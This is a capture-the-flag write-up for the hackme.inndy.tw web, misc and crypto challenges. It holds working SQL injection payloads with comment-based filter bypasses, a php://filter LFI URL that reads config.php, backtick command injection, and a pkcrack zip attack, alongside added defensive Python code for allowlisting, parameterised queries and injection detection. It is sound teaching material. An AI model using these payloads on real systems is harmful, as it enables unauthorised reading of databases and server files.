web

homepage

Open the link and look at the browser console: it contains a QR code, which decodes to

```
FLAG{Oh, You found me!!!!!! Yeeeeeeee.}
```
hide and seek

View the page source:

```
FLAG{0h U C meeeeeeeeeeeeeeeeeeee!}
```
guestbook

After creating a new post, viewing the message list leads to the URL https://hackme.inndy.tw/gb/?mod=read&id=13197, and the id parameter is a likely SQL injection point.

Trying id=13197 order by 5 produces an error, which confirms there are 4 columns.

```
?mod=read&id=0 union select 2,2,2, group_concat(table_name) from information_schema.tables where table_schema=database()
```

tables: flag,posts,users

```
id=0 union select 2,2,2, group_concat(column_name) from information_schema.columns where table_name="flag"
```

columns: id,flag,padding0,padding1

```
id=0 union select 2,2,2, group_concat(flag) from flag
```

flag:

```
FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#}
```
LFI

Basics

Recommended reading 1

Recommended reading 2

tips: LFI, php://filter

Open any page and look at the URL: the pages live under pages/, so https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

decodes to: Can you read the flag<?php require('config.php'); ?>?

Then read config.php the same way, which contains

```php
$flag = "FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}";
```
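The wrapper in the URL above works because whatever is in the page parameter reaches a PHP include unchanged. As an added example that is not part of this writeup or the challenge, here is a Python model of the safer pattern: resolve ?page= against a fixed allowlist, reject anything that carries a scheme prefix or looks like a path, and decode the base64 that php://filter/read=convert.base64-encode returns so the disclosed source can be inspected. The PAGES dictionary, the function names resolve_page and decode_filter_output, and the sample bodies are constructed for this example.

```python
import base64
import re

# Constructed stand-in for the site's pages/ directory (assumption: the real
# app includes pages/<name>.php); the bodies are illustrative only.
PAGES = {
    "index": "<h1>hackme lfi</h1>",
    "flag": "Can you read the flag<?php require('config.php'); ?>?",
}

# Anything with a scheme prefix (php://, file://, data://, expect://, ...)
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")
# Plain page names only: no slashes, dots or NUL bytes, so no traversal or wrappers.
NAME_RE = re.compile(r"^[a-z0-9_-]{1,32}$")


def resolve_page(param):
    """Map ?page= to a page body from the fixed allowlist.

    Returns None for stream wrappers, paths, traversal, NUL bytes or unknown
    names, instead of handing the raw value to include()."""
    if SCHEME_RE.match(param) or not NAME_RE.match(param):
        return None
    return PAGES.get(param)


def decode_filter_output(body):
    """Decode what php://filter/read=convert.base64-encode returns, i.e. the
    source of the included file rather than its rendered output."""
    return base64.b64decode(body).decode("utf-8")


# Constructed: what the wrapper would have returned for pages/flag.
SAMPLE_FILTER_OUTPUT = base64.b64encode(PAGES["flag"].encode("utf-8")).decode("ascii")
```

The allowlist check is deliberately stricter than "does not start with php://": a name regex that excludes dots and slashes closes traversal and every wrapper at once, and new wrappers need no new blacklist entry.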
ping

The filter is a blacklist:

```php
$blacklist = [
```

The backtick is not in the blacklist, so `ls` can be used:

```
`ls`
```

```
ping: flag.php
index.php: Name or service not known
```

Then:

```
`sort ????????`
```

```
ping: $flag = 'FLAG{ping_$(capture-the-flag)_UtUbtnvY5F9Hn5dR}';
```
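The blacklist above fails because it enumerates bad characters and leaves one out. Added example, not the challenge's code: a Python comparison of a constructed blacklist in the same spirit against an allowlist that accepts only an IP address or a well-formed DNS hostname, followed by building the ping argv as a list so that no shell ever sees the value. BLACKLIST, is_valid_target, build_ping_command and ping are names chosen here; the blacklist contents are made up for the example and deliberately omit the backtick to mirror the gap the writeup walks through.

```python
import ipaddress
import re
import subprocess

# A blacklist in the spirit of the challenge's $blacklist (constructed here,
# not the site's list). It lacks the backtick on purpose, to show why
# enumerating bad characters is the wrong shape for this check.
BLACKLIST = [";", "&", "|", "$", "(", ")", "<", ">", "flag"]


def blacklist_rejects(target):
    """True when any blacklisted token appears; backtick substitution slips past it."""
    return any(token in target for token in BLACKLIST)


# Allowlist: RFC 1123 style hostname labels, or anything ipaddress accepts.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def is_valid_target(target):
    """Accept only a literal IP address or a well-formed DNS hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def build_ping_command(target):
    """Return the argv for a single ping, or None if the target is rejected.
    The list form never goes through a shell, so even a value containing
    backticks or $() would reach ping as a literal hostname string."""
    if not is_valid_target(target):
        return None
    return ["ping", "-c", "1", target]


def ping(target):
    """Run the validated command; returns stdout as text, or None if rejected."""
    argv = build_ping_command(target)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True).stdout
```

The two checks are independent defences: the allowlist rejects the writeup's inputs because they are not hostnames at all, and the list-form subprocess call means that even a validation bug would not turn a parameter into a command.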
scoreboard

Capture the request and look at the response headers, which give

```
FLAG{Header can hide some data aswell.}
```
login0

Look at the code first. The key parts:

```php
function safe_filter($str)
```

```php
$sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
```

```
name=admin\' ||1=1 -- &password=guest
```

response:

```
Hi, guest
You are not admin!
```

```
name=admin\' ||1=1 limit 1,10 -- &password=guest
```

flag:

```
Hi, admin
You are admin!
FLAG{\' UNION SELECT "I Know SQL Injection" #}, flag2 in the database!
```
login as admin 0.1

The previous flag gave a hint: flag2 in the database

```
name=admin\' union select 1,database(),3,4#&password=a
```

database(): login_as_admin0>

```
name=admin\' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3,4#&password=a
```

table: h1dden_f14g,user (limit 1,1 gives the other table name)

```
name=admin\' union select 1,(select column_name from information_schema.columns where table_name="h1dden_f14g" limit 0,1),3,4#&password=a
```

column_name: the_f14g

```
name=admin\' union select 1,(select group_concat(the_f14g) from h1dden_f14g limit 0,1),3,4#&password=a
```

flag:

```
Hi, FLAG{Good, Union select is quite easy to exploit!}
```

The user table:

```
id       -> 1,2,3
user     -> guest,admin,inndy
password -> Hi, guest,password length is the key to secure your system,meow~i am not admin
```
login as admin 1.0

The key line in the filter:

```php
$strl = strtolower($str);
```

```
name=admin\'/**/UNion/**/select/**/1,2,3,4#&password=1
```

Spaces can be replaced with /**/: union/**/select stands in for union select, and select/**/ stands in for select followed by a space.

This gives the flag:

```
FLAG{He110, Admin\\' or 1337 < 314159 #}, flag2 in the database!
```
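The guestbook task and all three login tasks above share one root cause: user input is formatted straight into the SQL string with sprintf, and the later filters (quote escaping, keyword matching after strtolower) only block specific spellings, which /**/ and case changes sidestep. Added example, not the challenge's code: in Python, a normaliser plus detector that flags the payload shapes from this writeup in constructed request strings even when they are spelled union/**/select, next to the same login query written once with string formatting and once with bound parameters against an in-memory SQLite table. SQLite is used because it ships with Python; it uses -- for comments and treats || as string concatenation, so the injected credential in the comparison uses the OR 1=1 -- form rather than the ||1=1 form. All function names, the sample requests and the table contents are constructed.

```python
import re
import sqlite3

# Constructed request parameter strings in the shape of the writeup's payloads
# (not captured traffic); the first and last are ordinary requests.
SAMPLE_REQUESTS = [
    "id=13197",
    "id=0 union select 2,2,2, group_concat(table_name) from information_schema.tables where table_schema=database()",
    "name=admin\\' ||1=1 limit 1,10 -- &password=guest",
    "name=admin\\'/**/UNion/**/select/**/1,2,3,4#&password=1",
    "name=inndy&password=meow",
]


def normalize(value):
    """Canonicalise a parameter before matching: lowercase, turn inline
    comments (/**/) into whitespace and collapse whitespace runs. A filter
    that only lowercases still sees 'union/**/select' as one unbroken token."""
    value = value.lower()
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip()


INJECTION_RE = re.compile(
    r"union\s+select"              # stacked select after a quote break
    r"|\bor\b\s*\d+\s*=\s*\d+"     # or 1=1
    r"|\|\|\s*\d+\s*=\s*\d+"       # ||1=1 (MySQL reads || as OR by default)
    r"|information_schema"         # schema enumeration
    r"|database\(\)"
    r"|(?:--|#)\s*(?:&|$)"         # comment that swallows the rest of the query
)


def looks_like_injection(raw_param):
    return INJECTION_RE.search(normalize(raw_param)) is not None


def flag_requests(lines):
    """Return the request strings that match any injection pattern."""
    return [line for line in lines if looks_like_injection(line)]


def setup_db():
    """Constructed user table with the columns the writeup recovered."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "guest", "guest"), (2, "admin", "s3cret-placeholder"), (3, "inndy", "meow")],
    )
    return conn


def login_concatenated(conn, name, password):
    """The sprintf-style query from login0: the input becomes part of the SQL."""
    sql = "SELECT user FROM user WHERE user = '%s' AND password = '%s'" % (name, password)
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name, password):
    """Bound parameters: the driver sends the values separately, so quotes,
    comments and keywords inside them are only ever compared as data."""
    sql = "SELECT user FROM user WHERE user = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


def compare_logins(name, password):
    """Run the same credentials through both query styles on a fresh table."""
    conn = setup_db()
    return login_concatenated(conn, name, password), login_parameterized(conn, name, password)
```

The detector is a monitoring aid, not a fix: normalising before matching closes the /**/ and case tricks, but the reliable control is the parameterised query, which returns no rows for the injected credential regardless of how it is spelled.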
misc

flag

The flag is in the description:

```
FLAG{This is flag's format}
```
corgi-can-fly

No extra hint is given, so presumably steganography. In StegSolve, the Red plane 0 shows a QR code:

```
FLAG{Corgi is cutest aniaml on the earth >////////<}
```
television

Running hexdump -c television.bmp gives

```
FLAG{PuRe_R@ND0M_DaTa_Fr0M/D3V/UR@ND0M}
```
meow

binwalk shows an embedded zip file; foremost extracts it, and the zip turns out to be encrypted.

The check shows 0000, so this is not a fake-encrypted zip, and since the image inside is the same as the image split out earlier, this calls for a known-plaintext attack on the zip.

At first I wanted to use ARCHPR for the plaintext attack, but it kept erroring, so I switched to pkcrack on Kali.

Recommended reading: Kali may not ship pkcrack.

```bash
zip plain.zip 00000000.png
./pkcrack -C 00000094.zip -c meow/t39.1997-6/p296x100/10173502_279586372215628_1950740854_n.png -P plain.zip -p 00000000.png -d flag.zip -a
```

flag:

```
FLAG{pkcrack is your frien. MEOW, MEOW, MEOW~}
```
where is flag

tips: regular expression

It just asks you to find the flag.

regular expression.py:

```python
# -*- coding: UTF-8 -*-
```

```
FLAG{VizQLeu9M3aybJBA3f1AgFROGyuTLXZ2oeRbKf1Agf1AgFLAG9hBTI}
```
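Both television (a flag sitting in plain bytes inside a BMP) and where is flag (a flag hidden among look-alike decoys) reduce to scanning data for the FLAG{...} format. Added example, not the writeup's script: a Python scanner that pulls printable runs out of a byte blob the way hexdump -c or strings(1) would expose them, and a case-sensitive regular expression that keeps decoys such as f1Ag or a nested FLAG inside the braces from confusing the match. SAMPLE_BLOB and the flag value inside it are constructed; the function names are chosen here.

```python
import re

# Constructed byte blob standing in for a file like television.bmp: a BMP-style
# magic, filler, decoys in the wrong case, non-printable bytes and one flag
# (placeholder value, not the challenge's). An f1Ag and a FLAG token inside the
# braces mirror the decoys in the where-is-flag task.
SAMPLE_BLOB = (
    b"BM" + b"\x00" * 12
    + b"f1Ag{not-a-flag} flag{lowercase decoy} "
    + b"\xff\x13\x01"
    + b"FLAG{abc_f1Ag_FLAG9_xyz}"
    + b"\x00" * 8
)

# Case-sensitive, braces cannot nest, bounded length: f1Ag{...} and flag{...}
# do not match, while a FLAG token inside the braces is kept as payload.
FLAG_RE = re.compile(rb"FLAG\{[^{}\r\n]{1,120}\}")


def printable_runs(data, min_len=4):
    """Runs of printable ASCII, the same thing strings(1) or a hexdump reveals."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_flags(data):
    """Every FLAG{...} in the blob, in file order."""
    return [m.group().decode("ascii") for m in FLAG_RE.finditer(data)]


def find_flags_in_file(path):
    """Convenience wrapper for scanning a file on disk (e.g. an extracted image)."""
    with open(path, "rb") as fh:
        return find_flags(fh.read())
```

Working on bytes rather than decoded text matters for the BMP case: decoding the whole file as UTF-8 would fail on the pixel data long before the flag is reached.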
Crypto

easy

r u kidding

```
EKZF{Hs'r snnn dzrx, itrs bzdrzq bhogdq}
```

Caesar cipher:

```
FLAG{It's tooo easy, just caesar cipher}
```
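The ciphertext above decodes with a Caesar shift of 1. Added example, not part of the writeup: a Python implementation that applies a shift to ASCII letters only, then exhausts all 26 shifts looking for the FLAG{ prefix, which is exactly why this cipher offers no security: there are 25 usable keys, so trying every one is cheaper than any analysis. Function names are chosen here; the ciphertext is the challenge's own.

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase

# The challenge ciphertext, as shown on the page.
CIPHERTEXT = "EKZF{Hs'r snnn dzrx, itrs bzdrzq bhogdq}"


def caesar_shift(text, shift):
    """Shift every ASCII letter by `shift` positions (mod 26), preserving
    case; digits, punctuation and braces pass through unchanged."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def solve_caesar(ciphertext, crib="FLAG{"):
    """Try all 26 shifts and return (shift, plaintext) for the first one whose
    output starts with the crib; None if no shift matches. Shift 0 is tried
    too, so an unencrypted input is reported as shift 0."""
    for shift in range(26):
        candidate = caesar_shift(ciphertext, shift)
        if candidate.startswith(crib):
            return shift, candidate
    return None
```

The crib-based check is the only "cryptanalysis" needed here; with a known flag format the single matching shift stands out immediately among the 26 candidates.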
easy

```python
import binascii
```

```
FLAG{This is easy, right?}
```